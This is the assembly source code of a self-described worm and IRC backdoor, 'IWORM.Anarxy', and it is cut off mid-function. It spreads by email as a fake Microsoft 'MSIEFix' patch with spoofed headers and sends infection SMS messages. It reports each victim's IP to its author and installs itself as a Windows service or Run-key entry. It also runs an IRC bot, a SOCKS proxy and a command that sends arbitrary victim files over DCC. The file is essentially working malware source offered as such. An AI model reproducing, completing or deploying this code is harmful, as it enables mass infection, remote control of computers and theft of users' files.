RegisterServiceCtrlHandlerA dd ? db "SetServiceStatus", 0 SetServiceStatus dd ? dd -1 base64_alphabet db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' db '0123456789+/' msiefix_email _email_ msiefix_from db "support@microsoft.com", 0 msiefix_subject db "MSIEFix", 0 msiefix_message db "This is a fix, which will repair the newest bugs in Microsoft Internet Explorer." dw CR_LF db "You're Internet Explorer Development Team" dw CR_LF db 0 msiefix_file dd offset msiefix_file_ msiefix_file_ dd ? date_format db "MM/dd/yy", 0 return_path db "Return-Path:", 0 boundary db 'boundary="', 0 pop3_name db 'name="', 0 helo_cmd db "helo ", 0 mail_from db "mail from:", 0 rcpt_to db "rcpt to:", 0 data db "data" dw CR_LF db 0 end_data dw CR_LF db "." dw CR_LF db 0 quit db "quit" dw CR_LF db 0 recieved db "Recieved: from mail.microsoft.com ([]) with Microsoft SMTPSVC(5.5.1877.357.35)" dw CR_LF db 0 date db "Date: ", 0 from db "From: ", 0 to db "To: ", 0 subject db "Subject: ", 0 header db "MIME-Version: 1.0" dw CR_LF db "Message-ID: <--------122123B62DDFA11B>" dw CR_LF db 'Content-Type: multipart/mixed; boundary="----------122123B62DDFA11B"' dw CR_LF, CR_LF db 0 text db "------------122123B62DDFA11B" dw CR_LF db "Content-Type: text/plain; charset=us-ascii" dw CR_LF db "Content-Transfer-Encoding: 7bit" dw CR_LF, CR_LF db 0 end_boundary db "------------122123B62DDFA11B--" dw CR_LF, CR_LF db 0 attachment db "------------122123B62DDFA11B" dw CR_LF db 'Content-Type: application/octet-stream; name="', 0 attachment_ db '"' dw CR_LF db "Content-Transfer-Encoding: base64" dw CR_LF db 'Content-Disposition: attachment; filename="', 0 _smtp_ db "smtp.", 0 _mail_ db "mail.", 0 predvolby db "0601" db "0602" db "0606" db "0607" db "0723" db "0724" _sms_ db 'This mobile fone has been infected by IWORM.Anarxy by Ratter!' dw CR_LF db 0 _sms_1 db 'Let us arise, let us arise against the oppressors of humanity; all kings,' dw CR_LF db 'emperors, presidents of republics, priests of all religions are the true' dw CR_LF db 'enemies of the people; let us destroy along with them all juridical, political,' dw CR_LF db 'civil and religious institutions.' dw CR_LF db '- Manifesto of anarchists in the Romagna, 1878' dw CR_LF db 0 _sms_2 db 'I know you''re real proud of this world you''ve built, the way it worx, all' dw CR_LF db 'the nice little rules and such, but I''ve got some bad news.' dw CR_LF db 'I''ve decided to make a few changes.' dw CR_LF db 'Ratter - I''m a stranger in the world I haven''t made.' dw CR_LF db 0 _sms_3 db 'I love a flower, becoz it will wither, an animal - becoz it will die; - a human' dw CR_LF db 'being, becoz it will pass away and won''t be, becoz it feel''s it will perish' dw CR_LF db 'forever; I love - I do more than love - I worship to God, becoz - he is not.' dw CR_LF db '- Karel Hynek Macha' dw CR_LF db 0 _smses_ dd offset _sms_ dd offset _sms_1 dd offset _sms_2 dd offset _sms_3 sms_email db "0042" sms_number db "0000000000@sms.eurotel.cz", 0 sms_from db "anarxy_the_world@anarxy.com", 0 IFDEF _send_notice_ notice_email _email_ notice_message db "Victim XXX, whos ip is: " notice_ip db 25 dup(20h) db "is now connected to Internet ...", 0 notice_rcpt db "XXX@XXX.XXX", 0 ENDIF address_book db "Address Book #" address_book_ db 4 dup(?) sms_max dd 117 inet_threadz dd INET_THREADZ_COUNT dup(?) pop3_email_addr db "XXX" db (40-($-pop3_email_addr)) dup(?) pop3_server db "XXX" ; 20 bytez for POP3_SERVER db (20-($-pop3_server)) dup(?) pop3_user db "USER " pop3_user_ db "XXX" ; 20 bytez for POP_USER db (20-($-pop3_user_)+3) dup(?) ; without CR_LF and \null pop3_password db "PASS " pop3_password_ db "XXX" ; 20 bytez for POP3_PASSWORD db (20-($-pop3_password_)+3) dup(?) ; without CR_LF and \null pop3_quit db "QUIT" dw CR_LF db 0 pop3_handle dd ? pop3_stat db "STAT", 0 pop3_list db "LIST $email_message", 0 pop3_top db "TOP $email_message 1", 0 pop3_retr db "RETR $email_message", 0 pop3_dele db "DELE $email_message", 0 is_user_allowed dd offset _is_user_allowed_ send_message dd offset _send_message_ message_for_who dd offset _message_for_who_ hu_subkey db ".DEFAULT\Software\MSIEFix", 0 pswd_name db "Pswd", 0 pop3_server_name db "POP3_Server", 0 pop3_user_name db "POP3_User", 0 pop3_password_name db "POP3_Pswd", 0 pop3_email_ db "POP3_Eml", 0 default_settingz dd HKEY_USERS ; key dd offset hu_subkey ; subkey dd 5 ; count of Valz dd REG_DWORD ; type dd offset pswd_name ; val_name dd offset bot_password ; val pointer dd REG_SZ dd offset pop3_server_name dd offset pop3_server dd REG_SZ dd offset pop3_user_name dd offset pop3_user_ dd REG_SZ dd offset pop3_password_name dd offset pop3_password_ dd REG_SZ dd offset pop3_email_ dd offset pop3_email_addr _query_settingz_ dd HKEY_USERS ; key dd offset hu_subkey ; subkey dd 5 ; count of Valz dd 4 dd offset pswd_name dd 0 dd 20 dd offset pop3_server_name dd 0 dd 20 dd offset pop3_user_name dd 0 dd 20 dd offset pop3_password_name dd 0 dd 40 dd offset pop3_email_ dd 0 query_settingz dd HKEY_USERS ; key dd offset hu_subkey ; subkey dd 5 ; count of Valz dd 4 ; buffer size dd offset pswd_name ; val_name dd offset bot_password ; buffer pointer dd 20 dd offset pop3_server_name dd offset pop3_server dd 20 dd offset pop3_user_name dd offset pop3_user_ dd 20 dd offset pop3_password_name dd offset pop3_password_ dd 40 dd offset pop3_email_ dd offset pop3_email_addr soxz_proxy_fcz dd 3 dd offset soxz_method dd offset soxz_authentization dd offset soxz_make_proxy soxz_commandz dd offset soxz_make_connect dd offset soxz_error dd offset soxz_error stime SYSTEMTIME <> db "Dedicated to one great girlie named Bara. " db "In Czech Republic; 25.1.2001" .code start: @pushsz "MSIEFixMutex" push 0 push SYNCHRONIZE call OpenMutexA xchg eax, ecx jecxz ima_not_running push ecx call CloseHandle jmp exit_program ima_not_running: call anti_debug lea esi, [_query_settingz_] call query_registry jz registry_ok call set_default_settingz jmp registry_ok_ registry_ok: lea esi, [query_settingz] call query_registry registry_ok_: call GetVersion test eax, 8000000h jz ima_on_win9x call get_fcz_address jc ima_on_win9x push SC_MANAGER_CONNECT or SC_MANAGER_CREATE_SERVICE push 0 push 0 call OpenSCManagerA test eax, eax jz ima_on_win9x mov dword ptr [SC_Manager], eax push DELETE push offset service_name push eax call OpenServiceA xchg eax, ecx jecxz install_service push ecx call CloseServiceHandle push dword ptr [SC_Manager] call CloseServiceHandle push offset ste call StartServiceCtrlDispatcherA exit_program: push 0 call ExitProcess install_service: sub esp, 200 mov esi, esp push 200 push esi @pushsz "%windir%\system32\msiefix.exe" call ExpandEnvironmentStringsA sub esp, 300 mov edi, esp push 300 push edi push 0 call GetModuleFileNameA push 1 push esi push edi call CopyFileA add esp, 300 xor eax, eax push eax push eax push eax push eax push eax push esi push eax ; SERVICE_ERROR_IGNORE push SERVICE_AUTO_START push SERVICE_WIN32_OWN_PROCESS push eax push offset service_name push offset service_name push dword ptr [SC_Manager] call CreateServiceA add esp, 200 xchg eax, ecx jecxz install_close_sc_manager push ecx call CloseServiceHandle install_close_sc_manager: push dword ptr [SC_Manager] call CloseServiceHandle jmp exit_program ima_on_win9x: sub esp, 200 mov esi, esp push 200 push esi @pushsz "%windir%\system\msiefix.exe" call ExpandEnvironmentStringsA sub esp, 300 mov edi, esp push 300 push edi push 0 call GetModuleFileNameA push 1 push esi push edi call CopyFileA add esp, 300 xor eax, eax @pushvar
@pushvar push eax push KEY_QUERY_VALUE or KEY_SET_VALUE push eax push eax push eax @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push HKEY_LOCAL_MACHINE call RegCreateKeyExA push esi call lstrlen push eax push esi push REG_SZ push 0 @pushsz "MSIEFix" mov ebx, dword ptr [key_handle] push ebx call RegSetValueExA push ebx call RegCloseKey add esp, 200 @pushsz "MSIEFixMutex" push 1 push 0 call CreateMutexA @pushsz "kernel32.dll" call GetModuleHandleA @pushsz "RegisterServiceProcess" push eax call GetProcAddress xchg eax, ecx jecxz ima_on_win9x_next push 1 push 0 call ecx ima_on_win9x_next: jmp inet_thread get_fcz_address: lea esi, [fc_import] get_fcz_address_main_loop: mov eax, dword ptr [esi] inc eax jz get_fcz_address_end push esi call GetModuleHandleA xchg eax, ecx jecxz get_fcz_address_error xchg edi, ecx push esi call lstrlen inc eax add esi, eax mov ebp, dword ptr [esi] add esi, 4 get_fcz_address_loop: push esi push edi call GetProcAddress xchg eax, ecx jecxz get_fcz_address_error xchg ecx, ebx push esi call lstrlen inc eax add esi, eax mov dword ptr [esi], ebx add esi, 4 dec ebp jnz get_fcz_address_loop jmp get_fcz_address_main_loop get_fcz_address_end: clc retn get_fcz_address_error: stc retn service_main proc argc:DWORD, argv:DWORD local ss_handle:DWORD local CompKey:DWORD local Control:DWORD local Pipe:DWORD local Mutex:DWORD local overlapped:OVERLAPPED local _ss_:SERVICE_STATUS push 0 push CK_PIPE push 0 push -1 call CreateIoCompletionPort mov dword ptr [hIOCP], eax push offset service_handler push offset service_name call RegisterServiceCtrlHandlerA mov dword ptr [ss_handle], eax mov dword ptr [_ss_.SS_ServiceType], SERVICE_WIN32_OWN_PROCESS mov dword ptr [_ss_.SS_ControlsAccepted], SERVICE_ACCEPT_SHUTDOWN xor eax, eax mov dword ptr [CompKey], eax mov dword ptr [Control], eax ; SERVICE_CONTROL_RUN .repeat .if dword ptr [CompKey]==CK_SERVICE_CONTROL xor eax, eax mov dword ptr [_ss_.SS_Win32ExitCode], eax mov dword ptr [_ss_.SS_ServiceSpecificExitCode], eax mov dword ptr [_ss_.SS_CheckPoint], eax mov dword ptr [_ss_.SS_WaitHint], eax .if dword ptr [Control]==SERVICE_CONTROL_INTERROGATE lea eax, [_ss_] push eax push dword ptr [ss_handle] call SetServiceStatus jmp wait_for_io_port .endif mov eax, dword ptr [Control] mov eax, dword ptr [service_ctrl_to_pend+eax*4] .if eax!=0 mov dword ptr [_ss_.SS_CurrentState], eax push 0 pop dword ptr [_ss_.SS_CheckPoint] mov dword ptr [_ss_.SS_WaitHint], 500 lea eax, [_ss_] push eax push dword ptr [ss_handle] call SetServiceStatus .endif .if dword ptr [Control]==SERVICE_CONTROL_RUN mov eax, offset inet_thread call Create_Thread push eax call CloseHandle @pushsz "MSIEFixMutex" push 1 push 0 call CreateMutexA mov dword ptr [Mutex], eax push 0 push 1000 push pipe_send_size ; I/O buffer size push pipe_send_size push 1 push PIPE_TYPE_BYTE push PIPE_ACCESS_OUTBOUND or FILE_FLAG_OVERLAPPED @pushsz "\\.\pipe\MSIEFixPipe" call CreateNamedPipeA mov dword ptr [Pipe], eax push 0 push CK_PIPE push dword ptr [hIOCP] push eax call CreateIoCompletionPort lea edi, [overlapped] xor eax, eax mov ecx, type(OVERLAPPED)/4 rep stosd lea eax, [overlapped] push eax push dword ptr [Pipe] call ConnectNamedPipe .endif .if dword ptr [Control]==SERVICE_CONTROL_SHUTDOWN push dword ptr [Pipe] call CloseHandle push dword ptr [Mutex] call CloseHandle .endif .endif mov eax, dword ptr [_ss_.SS_CurrentState] mov eax, dword ptr [service_pend_to_state+eax*4] .if eax!=0 mov dword ptr [_ss_.SS_CurrentState], eax xor eax, eax mov dword ptr [_ss_.SS_CheckPoint], eax mov dword ptr [_ss_.SS_WaitHint], eax lea eax, [_ss_] push eax push dword ptr [ss_handle] call SetServiceStatus .endif .if dword ptr [CompKey]==CK_PIPE push 0 @pushvar
push pipe_send_size push offset pipe_send push dword ptr [Pipe] call WriteFile push dword ptr [Pipe] call FlushFileBuffers push dword ptr [Pipe] call DisconnectNamedPipe lea edi, [overlapped] xor eax, eax mov ecx, type(OVERLAPPED)/4 rep stosd lea eax, [overlapped] push eax push dword ptr [Pipe] call ConnectNamedPipe .endif wait_for_io_port: .if dword ptr [_ss_.SS_CurrentState]!=SERVICE_STOPPED lea eax, [CompKey] push INFINITE @pushvar
push eax @pushvar push dword ptr [hIOCP] call GetQueuedCompletionStatus push dword ptr [bytes_transfered] pop dword ptr [Control] .endif .until dword ptr [_ss_.SS_CurrentState]==SERVICE_STOPPED leave retn 8 service_main endp service_handler proc control:DWORD push 0 push CK_SERVICE_CONTROL push dword ptr [control] push dword ptr [hIOCP] call PostQueuedCompletionStatus leave retn 4 service_handler endp inet_thread_wait: push 1000 call Sleep inet_thread: call is_online jecxz inet_thread_wait mov dword ptr [online_flag], 1 xor eax, eax push eax push eax push eax call HeapCreate test eax, eax jz inet_thread_end mov dword ptr [heap_handle], eax sub esp, 1000h push esp push 1 call WSAStartup add esp,1000h test eax, eax jnz inet_thread_end IFNDEF email mov eax, offset ircbot_thread call Create_Thread mov dword ptr [inet_threadz], eax ELSE mov eax, offset pop3_gateway call Create_Thread mov dword ptr [inet_threadz], eax ENDIF mov eax, offset sms_thread call Create_Thread mov dword ptr [inet_threadz+4], eax mov eax, offset soxz_proxy call Create_Thread mov dword ptr [inet_threadz+8], eax IFDEF _send_notice_ call send_notice ; notice about victim ... ENDIF inet_thread_online_loop: push 1000 call Sleep call is_online jecxz inet_thread_not_online jmp inet_thread_online_loop inet_thread_not_online: and dword ptr [online_flag], 0 push 20000 push 1 push offset inet_threadz push INET_THREADZ_COUNT call WaitForMultipleObjects inc eax cmp eax, WAIT_TIMEOUT jnz inet_threadz_close_handles lea esi, [inet_threadz] push INET_THREADZ_COUNT pop ecx inet_threadz_terminate_loop: push ecx push 0 push dword ptr [esi] call TerminateThread pop ecx add esi, 4 loop inet_threadz_terminate_loop inet_threadz_close_handles: lea esi, [inet_threadz] push INET_THREADZ_COUNT pop ecx inet_threadz_loop: push ecx push dword ptr [esi] call CloseHandle pop ecx add esi, 4 loop inet_threadz_loop call WSACleanup push dword ptr [heap_handle] call HeapDestroy jmp inet_thread inet_thread_end: push 0 call ExitThread is_online: sub esp, 500 mov edi, esp push 0 mov eax, esp push 500 mov edx, esp mov dword ptr [edi], 412 ; type(RASCONN) push eax push edx push edi call RasEnumConnectionsA mov edi, dword ptr [edi+4] pop eax pop eax xchg eax, ecx jecxz is_online_nope sub esp, 200 mov esi, esp mov dword ptr [esi], 160 ;type(RASCONNSTATUSA) push esi push edi call RasGetConnectStatusA xor ecx, ecx cmp dword ptr [esi.RCS_rasconnstate], RASCS_CONNECTED lahf add esp, 200 sahf jnz is_online_nope inc ecx is_online_nope: add esp, 500 retn ircbot_thread: @SEH_SetupFrame call GetTickCount mov dword ptr [random_value], eax mov dword ptr [send_message], offset _send_message_ mov dword ptr [is_user_allowed], offset _is_user_allowed_ IFDEF log xor eax, eax push eax push eax push CREATE_ALWAYS push eax push FILE_SHARE_READ push GENERIC_WRITE @pushsz "ircbot.log" call CreateFileA inc eax jz exit_ircbot_thread dec eax mov dword ptr [log_handle], eax ENDIF mov eax, 10000 call heap_alloc mov dword ptr [buffer], eax mov dword ptr [in_buffer], eax mov eax, 512 call heap_alloc mov dword ptr [str_buffer], eax connect_to_server_: cmp dword ptr [online_flag], 1 jnz end_close_socket call connect_to_server jc end_close_socket and dword ptr [bytes_read], 0 ircbot_main_loop: call get_message jc connect_to_server_ call parse_message cmp dword ptr [online_flag], 1 jnz end_close_socket call do_message jmp ircbot_main_loop end_close_socket: push dword ptr [socket_handle] call closesocket end_close_file: IFDEF log push dword ptr [log_handle] call CloseHandle ENDIF exit_ircbot_thread: @SEH_RemoveFrame push 0 call ExitThread connect_to_server: push dword ptr [socket_handle] call closesocket push 0 push SOCK_STREAM push AF_INET call socket inc eax jz connect_to_server_error dec eax mov dword ptr [socket_handle], eax try_server_again: mov eax, dword ptr [cur_server_name] lea eax, [eax*4+server_names] inc dword ptr [cur_server_name] mov esi, dword ptr [eax] or esi, esi jnz server_ok and dword ptr [cur_server_name], 0 jmp try_server_again server_ok: call get_hostent jz try_server_again lea edi, _sin_ mov ebx, dword ptr [cur_server_name] dec ebx movzx ebx, word ptr [ebx*2+server_ports] call update_sin push type(sockaddr_in) push edi push dword ptr [socket_handle] call connect test eax, eax jnz try_server_again call get_local_host call generate_nick lea esi, [my_nick] call send_message lea esi, [my_user] call send_message clc retn connect_to_server_error: stc retn ; in: esi - pointer to ip address ; edi - where to store inet_addr get_hostent: movzx eax, byte ptr [esi] push eax call isalpha add esp, 4 xchg eax, ecx jecxz get_hostent_its_ivp4 push esi call gethostbyname jmp get_hostent_end get_hostent_its_ivp4: push esi call inet_addr sub esp, 4 mov ebx, esp mov dword ptr [ebx], eax push AF_INET push 4 push ebx call gethostbyaddr add esp, 4 get_hostent_end: test eax, eax retn ; in: edi - pointer to sockaddr_in struc ; ebx - port number ; eax - hostent update_sin: xchg eax, esi add esi, h_addr push edi xor eax, eax push edi mov ecx, type(sockaddr_in)/4 rep stosd pop edi movsw lodsw xchg eax, ecx inc edi inc edi mov eax, dword ptr [esi] mov esi, dword ptr [eax] rep movsb pop edi push edi lea edi, [edi.sin_port] push ebx call htons stosw pop edi retn generate_nick: lea edi, [my_nick__] mov ecx, 9 generate_nick_loop: mov ebx, 56 call get_random add al, 41h stosb dec ecx jnz generate_nick_loop retn get_local_host: mov eax, 500 call heap_alloc xchg eax, edi push 500 push edi call gethostname push edi call gethostbyname xchg eax, ecx jecxz get_local_host_end mov ebx,[ecx+3*4] mov ebx,[ebx] mov ebx,[ebx] push ebx call htonl mov dword ptr [local_host_ip], eax get_local_host_end: push edi call heap_free retn ; in: esi - ASCIIZ message _send_message_: push 1000 pop eax call heap_alloc mov dword ptr [temp_buffer], eax mov eax, 1500 call heap_alloc xchg eax, edi push edi call find_replacementz mov eax, CR_LF stosw pop esi sub edi, esi IFDEF log push 0 @pushvar
push edi push esi push dword ptr [log_handle] call WriteFile ENDIF push 0 push edi push esi push dword ptr [socket_handle] call send push esi call heap_free push dword ptr [temp_buffer] call heap_free retn find_replacementz: lodsb test al, al jz find_replacementz_end cmp al, '$' jnz find_replacementz_next push eax push edi mov edi, dword ptr [temp_buffer] call move_until_gap pop edi lea ebx, [replacementz] find_replacementz_loop: cmp dword ptr [ebx], 0 jz find_replacementz_no add ebx, 8 push dword ptr [temp_buffer] push dword ptr [ebx-8] call lstrcmpi test eax, eax jnz find_replacementz_loop push dword ptr [ebx-4] push edi call lstrcpy push dword ptr [ebx-4] call lstrlen add edi, eax pop eax jmp find_replacementz find_replacementz_no: pop eax stosb push dword ptr [temp_buffer] push edi call lstrcpy push dword ptr [temp_buffer] call lstrlen add edi, eax jmp find_replacementz find_replacementz_next: stosb jmp find_replacementz find_replacementz_end: retn move_until_gap: cmp byte ptr [esi], 0 jz move_until_gap_end cmp byte ptr [esi], 20h jz move_until_gap_end jc move_until_gap_end movsb jmp move_until_gap move_until_gap_end: xor eax, eax stosb retn get_message: @SEH_SetupFrame get_message_: mov ecx, dword ptr [bytes_read] jecxz read_from_server mov edi, dword ptr [cur_in_buffer] mov ebx, edi get_message_loop: cmp word ptr [edi], CR_LF jz get_message_found_cr_lf inc edi dec ecx jecxz read_from_server jmp get_message_loop get_message_found_cr_lf: inc edi inc edi sub edi, ebx mov dword ptr [bytes_read], ecx xchg edi, ecx xchg ebx, esi add dword ptr [cur_in_buffer], ecx push ecx mov dword ptr [cur_message_size], ecx mov edi, dword ptr [str_buffer] rep movsb pop ecx IFDEF log push 0 @pushvar
push ecx push dword ptr [str_buffer] push dword ptr [log_handle] call WriteFile ENDIF clc jmp get_message_error+1 read_from_server: push 0 push 10000 push dword ptr [in_buffer] push dword ptr [socket_handle] call recv inc eax jz get_message_error dec eax mov dword ptr [bytes_read], eax mov eax, dword ptr [in_buffer] mov dword ptr [cur_in_buffer], eax jmp get_message_ get_message_error: stc lahf @SEH_RemoveFrame sahf retn parse_message: @SEH_SetupFrame mov edi, dword ptr [str_buffer] and dword ptr [msg_command], 0 cmp byte ptr [edi], ':' jnz parse_message_next inc edi mov dword ptr [msg_from], edi push edi mov eax, edi call go_until_gap inc edi sub edi, eax xchg edi, ecx pop edi mov eax, '!' repnz scasb jnz parse_message_no_nick and byte ptr [edi-1], 0 call go_until_gap jc parse_message_end inc edi jmp parse_message_check parse_message_no_nick: and byte ptr [edi-1], 0 parse_message_check: push dword ptr [msg_from] push dword ptr [_my_nick] call lstrcmpi xchg eax, ecx jecxz parse_message_end parse_message_next: mov dword ptr [msg_command], edi call go_until_gap and byte ptr [edi], 0 jc parse_message_end inc edi cmp byte ptr [edi], ':' jz parse_message_skip_to mov dword ptr [msg_to], edi call go_until_gap and byte ptr [edi], 0 jc parse_message_end inc edi parse_message_skip_to: call go_over_gapz jc parse_message_end mov dword ptr [msg_paramz], edi mov eax, 12345678h cur_message_size equ $-4 mov edi, dword ptr [str_buffer] and byte ptr [edi+eax-2], 0 parse_message_end: @SEH_RemoveFrame retn do_message: cmp dword ptr [msg_command], 0 jz do_message_end lea ebx, [commandz] do_message_loop: cmp dword ptr [ebx], 0 jz do_message_end add ebx, 8 push dword ptr [msg_command] push dword ptr [ebx-8] call lstrcmpi test eax, eax jnz do_message_loop call dword ptr [ebx-4] do_message_end: retn ping_fc: mov eax, dword ptr [msg_paramz] mov dword ptr [pong_reply], eax lea esi, [pong_command] call send_message retn my_join_fc: lea esi, [invisible] call send_message lea esi, [my_join] call send_message lea esi, [key_channel] call send_message retn privmsg_fc: xor ecx, ecx lea esi, [bot_commandz] mov edi, dword ptr [msg_paramz] call lower_case_bot_command privmsg_fc_loop: mov cl, byte ptr [esi] jecxz privmsg_fc_end inc esi push edi push esi push ecx repz cmpsb pop ecx pop esi pop edi lahf add esi, ecx add esi, 4 sahf jnz privmsg_fc_loop cmp ecx, ebx jnz privmsg_fc_loop add edi, ecx call dword ptr [esi-4] mov dword ptr [privmsg_what], offset all_iz_ok jnc privmsg_fc_no_error mov dword ptr [privmsg_what], offset error_ privmsg_fc_no_error: call message_for_who mov dword ptr [recipient], eax lea esi, [privmsg_msg] call send_message privmsg_fc_end: retn lower_case_bot_command: pushad push edi call go_over_gapz mov ecx, edi call go_until_gap mov ebx, edi mov al, byte ptr [edi] and byte ptr [edi], 0 sub ebx, ecx mov esi, edi pop edi call lower_case mov edi, esi stosb cmp dword ptr [edi-4], " ccd" jnz $+5 push 8 pop ebx mov dword ptr [esp.Pushad_ebx], ebx popad retn lower_case: pushad lower_case_loop: mov al, byte ptr [edi] test al, al jz lower_case_end cmp al, 41h jc lower_case_go_on cmp al, 5ah ja lower_case_go_on add al, 20h lower_case_go_on: stosb jmp lower_case_loop lower_case_end: popad retn nick_error_fc: call generate_nick lea esi, [my_nick] call send_message retn get_random: push ecx push ebx mov eax, 12345678 random_value equ $-4 xor edx, edx mov ecx, 75abcd89h mul ecx inc eax mov ecx, 8ab88c8eh div ecx xchg eax, edx xor eax, edx mov dword ptr [random_value], eax xor edx, edx pop ebx div ebx xchg eax, edx pop ecx ret go_over_gapz: cmp byte ptr [edi], 0 stc jz go_over_gapz_end cmp byte ptr [edi], 0dh stc jz go_over_gapz_end cmp byte ptr [edi], ':' jz go_over_gapz_inc cmp byte ptr [edi], 20h jz go_over_gapz_inc jc go_over_gapz_inc go_over_gapz_end: retn go_over_gapz_inc: inc edi jmp go_over_gapz go_over_all_gapz: cmp byte ptr [edi], 20h jbe go_over_all_gapz_inc retn go_over_all_gapz_inc: inc edi jmp go_over_all_gapz _message_for_who_: and dword ptr [to_flag], 0 mov ebx, dword ptr [msg_from] push dword ptr [msg_to] push dword ptr [_my_nick] call lstrcmpi xchg eax, ecx jecxz message_for_who_end mov ebx, dword ptr [msg_to] mov dword ptr [to_flag], 1 message_for_who_end: xchg eax, ebx retn bot_login_command: call go_over_gapz jc bot_login_command_end_error mov esi, edi push 0 call gimme_CRC32 cmp eax, dword ptr [bot_password] jnz bot_login_command_end_error push 1 pop eax call is_user_allowed jnc bot_login_command_end_error push 1 pop eax call add_oper jc bot_login_command_end_error clc retn bot_login_command_end_error: stc retn bot_logout_command: xor eax, eax call is_user_allowed jc bot_logout_command_end call remove_oper bot_logout_command_end: retn bot_reconnect_command: push 1 pop eax call is_user_allowed jc bot_reconnect_command_end_error add esp, 12 jmp connect_to_server_ bot_reconnect_command_end_error: retn bot_quit_command: push 1 pop eax call is_user_allowed jc bot_quit_command_end_error lea esi, [quit_message] call send_message add esp, 12 jmp end_close_socket bot_quit_command_end_error: retn bot_opme_command: push 1 pop eax call is_user_allowed jc bot_opme_command_end push dword ptr [channel] call go_over_gapz jc bot_opme_use_default mov dword ptr [channel], edi bot_opme_use_default: mov eax, dword ptr [msg_from] mov dword ptr [op_who], eax lea esi, [op_message] call send_message pop dword ptr [channel] clc bot_opme_command_end: retn add_oper: mov byte ptr [add_oper_rites], al lea esi, dword ptr [operz] mov edi, esi lodsd inc eax cmp eax, MAX_ALLOWED_OPERZ ja add_oper_error stosd add_oper_loop: mov edi, esi lodsd xchg eax, ecx jecxz add_oper_found_gap inc ecx jz add_oper_found_gap add esi, type(oper) - 4 jmp add_oper_loop add_oper_found_gap: push dword ptr [msg_from] call lstrlen inc eax call heap_alloc stosd push dword ptr [msg_from] push eax call lstrcpy mov al, 1 add_oper_rites equ $-1 stosb clc retn add_oper_error: stc retn remove_oper: lea esi, dword ptr [operz] lodsd xchg eax, ecx jecxz remove_oper_end_error remove_oper_loop: lodsd test eax, eax jz remove_oper_loop_ inc eax jz remove_oper_end_error dec eax push eax push dword ptr [msg_from] call lstrcmpi test eax, eax jz remove_oper_ok remove_oper_loop_: add esi, type(oper) - 4 dec ecx jnz remove_oper_loop jmp remove_oper_end_error remove_oper_ok: push dword ptr [esi-4] call heap_free and dword ptr [esi-4], 0 and byte ptr [esi], 0 dec dword ptr [operz] clc retn remove_oper_end_error: stc retn _is_user_allowed_: mov byte ptr [user_rites], al lea esi, dword ptr [operz] lodsd xchg eax, ecx jecxz is_user_allowed_end_error is_user_allowed_loop: lodsd test eax, eax jz is_user_allowed_go_on inc eax jz is_user_allowed_end_error dec eax push eax push dword ptr [msg_from] call lstrcmpi test eax, eax jnz is_user_allowed_go_on cmp byte ptr [esi], 1 user_rites equ $-1 jae is_user_allowed_ok is_user_allowed_go_on: add esi, type(oper) - 4 dec ecx jnz is_user_allowed_loop jmp is_user_allowed_end_error is_user_allowed_ok: clc retn is_user_allowed_end_error: stc retn bot_redir_command: xor eax, eax call is_user_allowed jc bot_redir_command_error call go_over_gapz jc bot_redir_command_error xchg esi, edi call send_message clc jmp $+3 bot_redir_command_error: stc retn bot_chg_pswd_command: push 1 pop eax call is_user_allowed jc bot_chg_pswd_command_end_error call message_for_who cmp dword ptr [to_flag], 0 jnz bot_chg_pswd_command_end_error call go_over_gapz jc bot_chg_pswd_command_end_error mov esi, edi push 0 call gimme_CRC32 mov dword ptr [bot_password], eax lea edx, [hu_subkey] mov ecx, dword ptr [default_settingz] push REG_DWORD pop ebx lea edi, [pswd_name] lea esi, [bot_password] call reg_set_value clc retn bot_chg_pswd_command_end_error: stc retn ping_command_: mov eax, dword ptr [msg_from] mov dword ptr [recipient], eax mov dword ptr [privmsg_what], offset dont_ping_me lea esi, [privmsg_msg] call send_message add esp, 8 retn go_until_gap: cmp byte ptr [edi], 0dh stc jz go_until_gap_end+1 cmp byte ptr [edi], 0 stc jz go_until_gap_end+1 cmp byte ptr [edi], 20h jz go_until_gap_end jc go_until_gap_end inc edi jmp go_until_gap go_until_gap_end: clc retn send_command: call go_over_gapz jc send_command_error xor eax, eax call is_user_allowed jc send_command_error mov eax, 200 call heap_alloc xchg eax, esi push esi xchg esi, edi call move_until_gap xchg esi, edi call go_over_gapz xchg esi, edi call move_until_gap pop esi @pushvar
push 0 push esi push offset dcc_send_thread push 8192 push 0 call CreateThread xchg eax, ecx jecxz send_command_error push ecx call CloseHandle clc retn send_command_error: stc retn dcc_send_thread proc file_name:DWORD local file_handle:DWORD local bytes_2_send:DWORD local DCC_socket:DWORD local port:DWORD local DCC_sin:sockaddr_in local read_fds:fd_set local time_out:timeval xor eax, eax push eax push eax push OPEN_EXISTING push eax push eax push GENERIC_READ push dword ptr [file_name] call CreateFileA inc eax jz dcc_send_thread_end dec eax mov dword ptr [file_handle], eax push 0 push dword ptr [file_handle] call GetFileSize mov dword ptr [bytes_2_send], eax push 0 push SOCK_STREAM push AF_INET call socket inc eax jz dcc_send_thread_end_close_file dec eax mov dword ptr [DCC_socket], eax mov dword ptr [DCC_sin.sin_family], AF_INET xor eax, eax lea edi, [DCC_sin.sin_zero] stosd stosd mov dword ptr [DCC_sin.sin_addr], eax mov ebx, 3976 call get_random add eax, 1024 mov dword ptr [port], eax push eax call htons mov word ptr [DCC_sin.sin_port], ax lea eax, [DCC_sin] push type(sockaddr_in) push eax push dword ptr [DCC_socket] call bind test eax, eax jnz dcc_send_thread_end_close_socket synchronize_msg_sending: push 100 call Sleep cmp dword ptr [syn_flag], 0 jnz synchronize_msg_sending inc dword ptr [syn_flag] lea edi, [dcc_send_msg_] xor edx, edx push 10 pop ecx mov eax, dword ptr [local_host_ip] call convert_num add edi, ebx mov al, 20h stosb push eax mov eax, dword ptr [port] call convert_num pop eax add edi, ebx stosb mov eax, dword ptr [bytes_2_send] call convert_num add edi, ebx mov ax, 01h stosw mov edi, dword ptr [file_name] mov dword ptr [dcc_file], edi call go_until_gap inc edi call go_over_gapz mov dword ptr [dcc_rcp], edi lea esi, [dcc_send_msg] call send_message dec dword ptr [syn_flag] push 3 push dword ptr [DCC_socket] call listen test eax, eax jnz dcc_send_thread_end_close_socket lea ebx, [read_fds] mov dword ptr [ebx.fd_count], 1 push dword ptr [DCC_socket] pop dword ptr [ebx.fd_array] lea ecx, [time_out] mov dword ptr [ecx.tv_sec], 50 and dword ptr [ecx.tv_usec], 0 xor eax, eax push ecx push eax push eax push ebx push eax call select xchg eax, ecx jecxz dcc_send_thread_end_close_socket inc ecx jz dcc_send_thread_end_close_socket push 0 